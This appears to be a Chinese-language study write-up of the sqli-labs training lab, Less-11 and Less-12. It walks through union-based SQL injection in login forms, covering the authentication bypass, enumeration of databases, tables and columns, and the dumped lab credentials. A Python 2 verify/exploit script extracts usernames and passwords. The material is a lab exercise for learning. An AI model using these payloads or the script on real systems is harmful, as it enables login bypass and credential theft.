之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象
基于错误的 SQL 注入
函数讲解
group_concat():将多行查询结果合并为一行返回,一次查询即可取回多条信息
distinct:对结果去重,去掉重复的值
Less-11 报错型 SQL 注入 - 单引号
测试
在 username 中输入 admin’ or ‘1’=’1 #
在 password 中输入任意内容猜字段数
1 ’ order by 2# // 登录失败,无显示
1 ’ order by 3# // 登录失败,报错
猜数据库名
1’union select 1,@@version#
1’union select 1,(select database() limit 0,1)#
1’union select 1,(select group_concat(distinct+table_schema,0x20) from information_schema.tables limit0,1)#
结果为 information_schema ,challenges ,dvwa ,mysql ,owasp10 ,security ,tikiwiki ,tikiwiki195
猜表名
1’union select 1,(select group_concat(distinct+table_name,0x20) from information_schema.tables where table_schema=’security’) #
结果为 emails ,referers ,uagents ,users
猜列名
1’ union select 1,(select group_concat(distinct+column_name,0x20) from information_schema.columns where table_name=’users’ and table_schema=’security’)#
结果为 id ,username ,password
猜数据
1’ union select 1,group_concat(distinct+username) from security.users #
1’ union select 1,group_concat(distinct+password) from security.users #
结果为
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4 Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
运行脚本
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# NOTE(review): the original was pasted as a single physical line; the line
# breaks and indentation below are reconstructed. The code is Python 2
# (print statements). `requests` is imported but not used in the code shown.
import requests
import hackhttp
import re


def verify(arg):
    """Probe the target given by `arg` with a fixed POST body and report
    whether the marker value appears in the response.

    `arg` is the base URL of the login form. Nothing is returned; the
    result is only printed.
    """
    print "verify start..."
    # The form is posted as x-www-form-urlencoded, so the payload must be URL-encoded.
    post = "uname=1%27%20union%20select%20md5(123),group_concat(password,0x20)%20from%20users%20 #&passwd=aaa&submit=Submit" # the payload must be URL-encoded
    hh = hackhttp.hackhttp()
    # hackhttp.http() presumably returns (status code, headers, body,
    # redirect URL, log); only `body` is used here -- verify against hackhttp.
    code, head, body, redirect_url, log = hh.http(arg,post)
    # 202cb962ac59075b964b07152d234b70 is md5("123"), the value the query
    # above asks the server to compute; its presence in the page means the
    # injected expression was evaluated by the database.
    if '202cb962ac59075b964b07152d234b70' in body:
        print "目标存在sql注入!"


def exploit(arg):
    """Read the `username` and `password` columns of security.users from the
    target given by `arg` and print them as one labelled string.

    Note the inconsistency with verify(): verify() queries `users`
    (unqualified) while this function queries `security.users`.
    """
    print "exploit start..."
    payload = ['username','password']
    # Accumulates the printed report; starts with the "username" label.
    username = "\nusername: "
    for i in payload:
        if i == 'password':
            # Label for the second column. "passowrd" is a typo in a runtime
            # string and is left unchanged here.
            username += '\npassowrd: '
        # Unlike verify(), this body is not URL-encoded before posting.
        post = "uname=1' union select 1,group_concat(distinct+{i}) from security.users #&passwd=aaa&submit=Submit".format(i=i)
        hh = hackhttp.hackhttp()
        code, head, body, redirect_url, log = hh.http(arg,post)
        # The lab echoes the second selected column after "Your Password:";
        # every match is appended to the report.
        user = re.findall("Your Password:(.*?)<br>",body)
        for c in user:
            username += c
    print "目标管理员用户: {username}".format(username=username)


if __name__ == '__main__':
    # Lab target (sqli-labs Less-11); both steps are run against the same URL.
    verify('http://10.10.10.130/sqli-labs/Less-11/?id=')
    exploit('http://10.10.10.130/sqli-labs/Less-11/?id=')
Less-12 报错型 SQL 注入 - 双引号
测试
在 username 中输入 admin”) or (“1”)=(“1 #
在 password 中输入任意内容猜字段数
1”) order by 2# // 登录失败,无显示
1”) order by 3# // 登录失败,报错
猜数据库名
1”)union select 1,@@version#
1”)union select 1,database()#
1”)union select 1,(select group_concat(distinct+table_schema,0x20) from information_schema.tables)#
结果为 information_schema ,challenges ,dvwa ,mysql ,owasp10 ,security ,tikiwiki ,tikiwiki195
猜表名
1”)union select 1,(select group_concat(distinct+table_name,0x20) from information_schema.tables where table_schema=’security’) #
结果为 emails ,referers ,uagents ,users
猜列名
1”) union select 1,(select group_concat(distinct+column_name,0x20) from information_schema.columns where table_name=’users’ and table_schema=’security’)#
结果为 id ,username ,password
猜数据
1”) union select 1,group_concat(distinct+username) from security.users #
1”) union select 1,group_concat(distinct+password) from security.users #
结果为
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4 Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4